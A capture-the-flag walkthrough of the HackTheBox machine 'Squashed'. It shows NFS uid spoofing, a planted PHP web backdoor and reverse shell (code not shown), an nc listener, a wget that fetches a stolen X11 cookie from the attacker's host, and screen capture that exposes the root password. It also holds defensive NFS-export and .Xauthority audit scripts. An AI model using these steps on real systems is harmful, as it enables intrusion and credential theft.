Squashed
Squashed writeup by Thamizhiniyan C S
Last updated
Greetings everyone,
In this write-up, we will tackle Squashed from HackTheBox.
Machine link: Squashed
Difficulty Level: Easy
Let's Begin 🙌
Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.
Once connected to the VPN service, click on "Join Machine" to access the machine's IP.
Upon joining the machine, you will be able to view the IP address of the target machine. We start by scanning it with nmap:
nmap -A -T4 -v <TARGET>
Port | Service | Version
---|---|---
22 | SSH | OpenSSH 8.2p1
80 | HTTP | Apache httpd 2.4.41
111 | rpcbind | -
First we take a look at the website running on port 80. After browsing the site we found nothing interesting.
Next we enumerate the NFS shares exported by the target machine. To list them we use the command:
showmount -e <IP-ADDRESS>
We can see two file shares. Both are exported to every host, which is denoted by the asterisk (`*`). Now we can mount these shares and look at their contents. To do that we have to manually mount the NFS shares on our local Kali machine.
To mount the NFS shares, we first have to create two directories as mount points. I created two directories, `ross` and `html`, to mount the shares `/home/ross` and `/var/www/html` respectively.
Next we have to mount these shares by using the command:
sudo mount -t nfs <IP-ADDRESS>:<TARGET-SHARE-NAME> <MOUNTING-LOCATION>
Now we have mounted the shares on our local machine. Let's take a look at them. First we look at the `/home/ross` share by changing into the `ross` directory.
We discover a `Passwords.kdbx` file, which is a KeePass database. Let's try to crack it with the `keepass2john` tool: `keepass2john <FILE>`.
`keepass2john` throws an error that this version of the KeePass database is not supported, so we can do nothing with this file. Let's search further for anything interesting.
We haven't found anything interesting in the `/home/ross` share, so we now take a look at the `/var/www/html` share by changing into the `html` directory. When we try to change directory, we get a permission denied error. If we run `ls -al`, we can see that the `html` share is owned by user id 2017. This means the share can only be accessed by a user with uid 2017: NFS trusts the uid presented by the client, so it is the numeric id, not the username, that matters.
To bypass this access control, we create a user with uid 2017 on our local machine; with this new user we can access the `html` share. We create the user with the desired uid using the command: `adduser <USERNAME> --uid 2017`.
After creating the user, we switch to it with the command `su <USERNAME>`. After switching user we change into the `html` directory and can start enumerating.
We can see that nothing interesting is found in this directory, but we can infer that it contains all the files of the website hosted on the target.
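From the defender's side, the reason the uid trick works is the export configuration: a share exported to `*` without `all_squash` honours whatever uid the mounting client presents. The audit script below is an added example (not part of the original writeup) that flags such exports; the `/etc/exports` content it checks is a constructed sample shaped like this box's two shares, and its option lists are assumptions.

```python
import re

# Constructed sample /etc/exports, shaped like the two shares on this box
# (exported to every host, "*"); the option lists are assumptions.
SAMPLE_EXPORTS = """\
# path          client(options)
/home/ross      *(rw,sync,no_subtree_check)
/var/www/html   *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup     10.10.14.0/24(rw,sync,all_squash,anonuid=65534,anongid=65534)
"""

SPEC_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")

def parse_exports(text):
    """Return (path, client, options) tuples, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = SPEC_RE.match(spec)
            client = m.group(1) or "*"        # a bare "(rw)" means every host
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, client, opts))
    return entries

def audit_exports(text):
    """Map "path client" -> list of findings; an empty list means no finding."""
    findings = {}
    for path, client, opts in parse_exports(text):
        issues = []
        if client == "*":
            issues.append("exported to every host; restrict to a host, network or netgroup")
        if "no_root_squash" in opts:
            issues.append("no_root_squash: a client's root is root on the export")
        if "all_squash" not in opts:
            issues.append("client uids trusted: a mounting host can pick any local uid "
                          "(on this box uid 2017 owns the html share); add all_squash/anonuid")
        findings[f"{path} {client}"] = issues
    return findings

if __name__ == "__main__":
    for target, issues in audit_exports(SAMPLE_EXPORTS).items():
        print(target, "->", "; ".join(issues) or "ok")
```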
Given that the `/var/www/html` share holds all the files of the website hosted on the target, we could craft a straightforward backdoor within this share and then attempt to establish a reverse shell connection to the target machine.
We can create a simple PHP backdoor in the current working directory:
To verify that the backdoor works, we send a GET request to `http://<IP-ADDRESS>/backdoor.php`, passing the command to execute on the target machine in a parameter named `cmd`.
GET request: `http://<IP-ADDRESS>/backdoor.php?cmd=id`
Our backdoor is working, as the response returns the id of the web server user on the target machine. Let's note the user details for further enumeration.
Now we can use a simple PHP reverse shell:
We have to URL-encode this reverse shell to use it as a parameter value in the URL. To do that, use https://www.urlencoder.org/ to encode the reverse shell above.
After encoding we will obtain a reverse shell like this:
The next step is to start a listener for the connection from the reverse shell that we have created. To start a listener, use the following command in a new terminal:
nc -nvlp 1234
After starting the listener, we can supply the encoded reverse shell as the parameter value in the URL:
Now if we press enter we can see that the site keeps loading, and if we check our listener we can see that we have received a shell.
Now we can start enumerating the target machine. Let's first check the `/home/alex` directory.
Hooray!!! We have found the `user.txt` file, our first flag, in the home directory of `alex`. Our next step is to find the root flag.
Let's first try to switch to the root directory.
We can see that we don't have access to the root directory, so we have to find a way to escalate our privileges to root. First we check the `/etc/passwd` file for other users.
In the `/etc/passwd` file we can see the presence of the `LightDM` display manager. Remember that in the initial stage of enumerating the `/home/ross` share, we found `.Xauthority` and `.xsession-errors` files. This suggests that a display is connected and configured through X11.
The X Window System (X11, or simply X) is a windowing system for bitmap displays, common on Unix-like operating systems.
X provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard. X does not mandate the user interface – this is handled by individual programs. As such, the visual styling of X-based environments varies greatly; different programs may present radically different interfaces. (Source: https://en.wikipedia.org/wiki/X_Window_System)
The presence of the `.Xauthority` and `.xsession-errors` files in the home directory indicates that a display might be configured, with ross potentially already authenticated. This theory is further supported by the display manager `LightDM` appearing in the `/etc/passwd` file.
Let's check whether any display is connected on the target machine by running the command `w`.
We can see that the user `ross` is connected to the display with id `:0`.
Now let's check what the `.Xauthority` and `.xsession-errors` files contain.
We can see that we don't have access to these files.
We can see that the `.Xauthority` and `.xsession-errors` files can only be accessed by the user with a `uid` of `1001`, so we have to create a user with a `uid` of `1001` to access them.
Now we have created a new user with a `uid` of `1001`. Switch to the new user with the command `su <USERNAME>`. Now we can try to view the contents of the `.Xauthority` file.
We can see that the `.Xauthority` file contains the cookie of the `ross` user's X11 session. We can use this cookie to act as user `ross` and gain access to the display. After gaining access, we can try to take screenshots of the connected display to see what is shown on it.
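To make the `.Xauthority` contents concrete: the file is a sequence of binary records, each holding an address family, a host, a display number, the authorization protocol name and the cookie bytes, which is what `xauth list` prints. The parser below is an added example (not from the original writeup) that decodes that format on a constructed sample record; it reports the cookie's length rather than the cookie itself, since the cookie is a bearer credential for the display.

```python
import struct

# Address families used in .Xauthority records (values from X11/Xauth.h).
FAMILIES = {0: "Internet", 6: "InternetV6", 254: "Wild", 256: "Local"}

def _field(buf, off):
    """Read one length-prefixed field: 2-byte big-endian length, then bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if off + n > len(buf):
        raise ValueError("truncated .Xauthority record")
    return buf[off:off + n], off + n

def parse_xauthority(buf):
    """Decode every record in an .Xauthority file image into a list of dicts."""
    entries, off = [], 0
    while off < len(buf):
        (family,) = struct.unpack_from(">H", buf, off)
        off += 2
        address, off = _field(buf, off)
        number, off = _field(buf, off)
        name, off = _field(buf, off)
        data, off = _field(buf, off)
        entries.append({
            "family": FAMILIES.get(family, str(family)),
            "address": address.decode(errors="replace"),
            "display": number.decode(errors="replace"),
            "protocol": name.decode(errors="replace"),
            # The cookie is the credential itself, so only its size is reported.
            "cookie_len": len(data),
        })
    return entries

def build_record(family, address, number, name, data):
    """Serialise one record; used here only to construct the sample input."""
    out = struct.pack(">H", family)
    for field in (address, number, name, data):
        out += struct.pack(">H", len(field)) + field
    return out

# Constructed sample: a Local-family record for display :0 on a host named
# "squashed" with a made-up 16-byte MIT-MAGIC-COOKIE-1 (not the box's cookie).
SAMPLE_XAUTHORITY = build_record(256, b"squashed", b"0", b"MIT-MAGIC-COOKIE-1", bytes(range(16)))

if __name__ == "__main__":
    for e in parse_xauthority(SAMPLE_XAUTHORITY):
        print(f"{e['address']}/{e['family']}:{e['display']}  {e['protocol']}  {e['cookie_len']} bytes")
```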
Now we have to move this `.Xauthority` cookie file to the `alex` user's directory on the target to gain access to the display. To do that we copy the `.Xauthority` file to the `/tmp` folder and host a simple HTTP server from the `/tmp` directory.
Now we have copied the file to the `/tmp` directory. The next step is to host a simple HTTP server. We can do this with Python's `http.server` module using the command: `python -m http.server`
Now our `/tmp` directory is served on port `8000`. From the reverse shell, change to the `/home/alex` directory and use the following command to download the `.Xauthority` file from our local machine.
Note: in this case we have to use our local machine's `tun0` IP address to download the file.
Command: `wget http://<tun0-IP-ADDRESS>:8000/<FILENAME>`
Now we have downloaded the `.Xauthority` file to the `/home/alex` directory. Next we have to set this cookie. To do that we point the `XAUTHORITY` environment variable at the downloaded `.Xauthority` file with the following command:
export XAUTHORITY=<LOCATION-TO-THE-FILE>
Now we have set the cookie successfully. Our next step is to take a screenshot of the display.
To take a screenshot we can use the following command:
Reference: https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11
In our case the command will be:
xwd -root -screen -silent -display <DISPLAY-ID> > <OUTPUT-FILE>
Details of the flags used:
- `-root`: selects the root window
- `-screen`: send the GetImage request to the root window
- `-silent`: operate silently
- `-display`: specify the display
Now we have successfully obtained the screenshot and have to copy this image to our local machine. To do that we can make use of the website hosted on the target machine: move the `scrshot.xwd` file to the `/var/www/html` directory. We know that we can reach `/var/www/html` from our local machine because we mounted the share, so when we check the `/var/www/html` share on our local machine we can find the `scrshot.xwd` file.
Now we can copy this file to the `/tmp` directory.
Next we convert the `scrshot.xwd` file to a `png` file in the `/tmp` folder with the command: `convert scrshot.xwd scrshot.png`
Now we can open the `scrshot.png` file to see its contents.
We can see a password manager with the root user’s password in the screenshot. Remember that our target machine has the ssh service open in port 22. Now we can use these credentials to ssh into the target machine.
Now we have gained access to the `root` user and can read the `root.txt` file.
Hooray!!! we have found the root flag.
Thank You.